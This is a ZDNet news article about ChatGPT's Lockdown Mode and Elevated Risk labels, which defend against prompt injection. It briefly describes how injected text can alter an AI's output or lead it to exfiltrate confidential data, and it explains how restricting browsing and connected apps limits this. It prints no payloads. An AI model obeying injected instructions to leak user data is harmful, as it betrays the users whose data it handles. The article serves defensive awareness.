ChatGPT's new Lockdown Mode can stop prompt injection - here's how it works

Source: ZDNet

ZDNET’s key takeaways

• Hackers use prompt injection to steal the private data you use in AI.
• ChatGPT’s new Lockdown Mode aims to prevent these attacks.
• Elevated Risk labels warn you of AI tools and content that could be risky.

Prompt injection attacks pose a serious threat to anyone who uses AI tools, especially professionals who rely on them at work. By exploiting a vulnerability that affects most AIs, a hacker can insert malicious code into a text prompt, which may then alter the results or even steal confidential data.

Also: 5 custom ChatGPT instructions I use to get better AI results – faster

Now, OpenAI has introduced a feature called Lockdown Mode to better thwart these types of attacks.

Lockdown Mode

OpenAI’s Lockdown Mode enhances protection against prompt injections and other advanced threats. With this setting enabled, ChatGPT is limited in how it can interact with external systems and data, thereby restricting an attacker’s ability to exfiltrate sensitive files.

Lockdown Mode is an optional security setting—not required for most ChatGPT users. It is geared toward security‑minded users such as executives or security professionals at large organizations. The feature is available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers.

Also: These 4 critical AI vulnerabilities are being exploited faster than defenders can respond

Lockdown Mode works by identifying which tools and capabilities in ChatGPT are most at risk and restricting access to any sensitive data in a conversation or from a connected app that could be exploited through prompt injection.

Disclosure: Ziff Davis, ZDNET’s parent company, filed an April 2025 lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.

For example, web browsing in Lockdown Mode limits access to cached content so that no live requests leave OpenAI’s network. Other features are disabled unless OpenAI can confirm that the data is safe, preventing attackers from stealing data through web browsing.

ChatGPT business plans already offer enterprise‑level security protection, which administrators can control via Workspace settings. Lockdown Mode adds an extra layer of defense, and Workspace admins can also choose which apps and actions are governed by Lockdown Mode.

Elevated Risk labels

OpenAI will now display an Elevated Risk label when you access certain features that could be risky. These labels appear in ChatGPT, the ChatGPT Atlas browser, and the Codex coding assistant, giving you a pause before working with a tool or content that could be exploited.

Also: The secret to AI job security? Stop stressing and pivot at work now – here’s how

For instance, developers using Codex can grant the tool network access to search the web for assistance. When this access is enabled, the Elevated Risk label warns you of potential risks, possible changes, and when such access is warranted.

The Elevated Risk labels are a short‑term solution to inform users of potential dangers. OpenAI plans to add more security features across the board to address additional risks and eventually make such labels unnecessary.